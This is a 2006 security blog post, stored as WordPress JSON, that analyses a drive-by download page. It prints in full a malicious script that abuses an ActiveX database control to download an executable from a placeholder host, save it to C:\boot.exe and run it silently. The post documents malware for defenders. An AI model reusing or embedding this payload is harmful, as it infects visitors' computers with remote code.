{"id":176,"date":"2006-12-24T09:41:10","date_gmt":"2006-12-24T13:41:10","guid":{"rendered":"http:\/\/blogs.law.harvard.edu\/zeroday\/2006\/12\/24\/another-variation-of-drive-by-downloa"},"modified":"2006-12-24T09:41:10","modified_gmt":"2006-12-24T13:41:10","slug":"another-variation-of-drive-by-downloaders","status":"publish","type":"post","link":"https:\/\/archive.blogs.harvard.edu\/zeroday\/2006\/12\/24\/another-variation-of-drive-by-downloaders\/","title":{"rendered":"another variation of drive by downloaders"},"content":{"rendered":"<p>The <a href=\"http:\/\/www.milw0rm.com\/exploits\/2052\">exploit <\/a> used is fairly old.  One other important thing to note is that the CLSID used here is a Microsoft <a href=\"http:\/\/www.microsoft.com\/windows2000\/en\/server\/iis\/default.asp?url=\/windows2000\/en\/server\/iis\/htm\/asp\/eadg9mp1.htm\"> database control<\/a>.  <\/p>\n<p><code>[zero@day testing]$ curl  http:\/\/EVIL_SITE\/db\/wm.htm<br \/>\n&lt;script&gt;<br \/>\nvar url,path;<br \/>\nurl=\"http:\/\/EVIL_SITE\/mc\/game\/db.exe\";<br \/>\npath=\"C:\\\\boot.exe\";<br \/>\ntry{<br \/>\n var ado=(document.createElement(\"object\"));<br \/>\n var d=1;<br \/>\n ado.setAttribute(\"classid\",\"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\");<br \/>\n var e=1;<br \/>\n var xml=ado.CreateObject(\"Microsoft.XMLHTTP\",\"\");<br \/>\n var f=1;<br \/>\n var ab=\"Adodb.\";<br \/>\n var cd=\"Stream\";<br \/>\n var g=1;<br \/>\n var as=ado.createobject(ab+cd,\"\");<br \/>\n var h=1;<br \/>\n xml.Open(\"GET\",url,0);<br \/>\n xml.Send();<br \/>\n as.type=1;<br \/>\n var n=1;<br \/>\n as.open();<br \/>\n as.write(xml.responseBody);<br \/>\n as.savetofile(path,2);<br \/>\n as.close();<br \/>\n var shell=ado.createobject(\"Shell.Application\",\"\");<br \/>\n shell.ShellExecute(path,\"\",\"\",\"open\",0);<br \/>\n}<br \/>\ncatch(e){}<br \/>\n;&lt;\/script&gt;<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"<p>The exploit used is fairly old. One other important thing to note is that the CLSID used here is a Microsoft database control. [zero@day testing]$ curl http:\/\/EVIL_SITE\/db\/wm.htm &lt;script&gt; var url,path; url=&#8221;http:\/\/EVIL_SITE\/mc\/game\/db.exe&#8221;; path=&#8221;C:\\\\boot.exe&#8221;; try{ var ado=(document.createElement(&#8220;object&#8221;)); var d=1; ado.setAttribute(&#8220;classid&#8221;,&#8221;clsid:BD96C556-65A3-11D0-983A-00C04FC29E36&#8243;); var e=1; var xml=ado.CreateObject(&#8220;Microsoft.XMLHTTP&#8221;,&#8221;&#8221;); var f=1; var ab=&#8221;Adodb.&#8221;; var cd=&#8221;Stream&#8221;; var g=1; var as=ado.createobject(ab+cd,&#8221;&#8221;); var h=1; xml.Open(&#8220;GET&#8221;,url,0); [&hellip;]<\/p>\n","protected":false},"author":214,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[272,275],"tags":[],"class_list":["post-176","post","type-post","status-publish","format-standard","hentry","category-digital-warfare","category-vulnerabilities"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/176","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/users\/214"}],"replies":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/comments?post=176"}],"version-history":[{"count":0,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/176\/revisions"}],"wp:attachment":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/media?parent=176"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/categories?post=176"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/tags?post=176"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}